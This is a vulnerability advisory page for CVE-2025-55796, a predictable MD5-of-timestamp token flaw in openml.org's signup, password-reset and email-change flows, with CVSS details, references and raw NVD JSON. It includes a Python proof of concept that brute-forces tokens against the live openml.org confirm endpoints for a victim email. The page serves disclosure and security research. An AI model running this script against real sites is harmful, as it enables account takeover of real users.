CVE-2025-55796

Description

The openml/openml.org web application version v2.0.20241110 uses predictable MD5-based tokens for critical user workflows such as signup confirmation, password resets, email confirmation resends, and email change confirmation. These tokens are generated by hashing the current timestamp formatted as "%d %H:%M:%S" without incorporating any user-specific data or cryptographic randomness. This predictability allows remote attackers to brute-force valid tokens within a small time window, enabling unauthorized account confirmation, password resets, and email change approvals, potentially leading to account takeover.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:openml:openml.org:*:*:*:*:*:*:*:* - VULNERABLE

openml/openml.org v2.0.20241110

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-55796 PoC - openml.org Predictable Token Generation This PoC demonstrates the token prediction vulnerability in openml.org """ import hashlib from datetime import datetime, timedelta import requests import itertools def generate_predictable_token(timestamp): """ Generate token using the vulnerable MD5-based timestamp hashing Format: MD5("%d %H:%M:%S") """ time_str = timestamp.strftime("%d %H:%M:%S") return hashlib.md5(time_str.encode()).hexdigest() def generate_token_candidates(start_time, end_time, step_seconds=1): """ Generate all possible tokens within a time window """ candidates = [] current = start_time while current <= end_time: token = generate_predictable_token(current) candidates.append((token, current)) current += timedelta(seconds=step_seconds) return candidates def brute_force_token(target_url, email, operation='signup', time_window_minutes=5): """ Brute force attack to find valid token Args: target_url: Base URL of openml.org email: Target user email operation: signup, password_reset, email_change time_window_minutes: Time window to search """ # Calculate time window end_time = datetime.now() start_time = end_time - timedelta(minutes=time_window_minutes) print(f"[*] Generating tokens for time window: {start_time} to {end_time}") candidates = generate_token_candidates(start_time, end_time) print(f"[*] Generated {len(candidates)} token candidates") # Try each token for token, timestamp in candidates: url = f"{target_url}/confirm/{operation}" params = { 'email': email, 'token': token } try: response = requests.get(url, params=params, timeout=5) # Check for successful confirmation if response.status_code == 200 and 'success' in response.text.lower(): print(f"[!] Valid token found: {token}") print(f"[!] Token generated at: {timestamp}") print(f"[!] {operation} confirmed successfully!") return token, timestamp except requests.exceptions.RequestException as e: print(f"[!] Request error: {e}") continue print("[-] No valid token found in time window") return None, None # Example usage if __name__ == "__main__": target = "https://openml.org" victim_email = "[email protected]" print("="*60) print("CVE-2025-55796 - openml.org Predictable Token PoC") print("="*60) # Attack scenarios brute_force_token(target, victim_email, 'signup', time_window_minutes=5) brute_force_token(target, victim_email, 'password_reset', time_window_minutes=5)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55796
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55796
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55796/
[4] VulDB https://vuldb.com/cve/CVE-2025-55796
[5] https://github.com/openml
[6] https://github.com/openml/openml.org
[7] https://github.com/openml/openml.org/security/advisories/GHSA-xfjh-gf9p-8qr6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55796", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:04.270", "lastModified": "2026-01-08T17:05:35.867", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The openml/openml.org web application version v2.0.20241110 uses predictable MD5-based tokens for critical user workflows such as signup confirmation, password resets, email confirmation resends, and email change confirmation. These tokens are generated by hashing the current timestamp formatted as \"%d %H:%M:%S\" without incorporating any user-specific data or cryptographic randomness. This predictability allows remote attackers to brute-force valid tokens within a small time window, enabling unauthorized account confirmation, password resets, and email change approvals, potentially leading to account takeover."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openml:openml.org:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.0.20241110", "matchCriteriaId": "BD59856B-8D8C-4BB9-9703-F6F804713C8C"}]}]}], "references": [{"url": "https://github.com/openml", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openml/openml.org", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openml/openml.org/security/advisories/GHSA-xfjh-gf9p-8qr6", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}]}}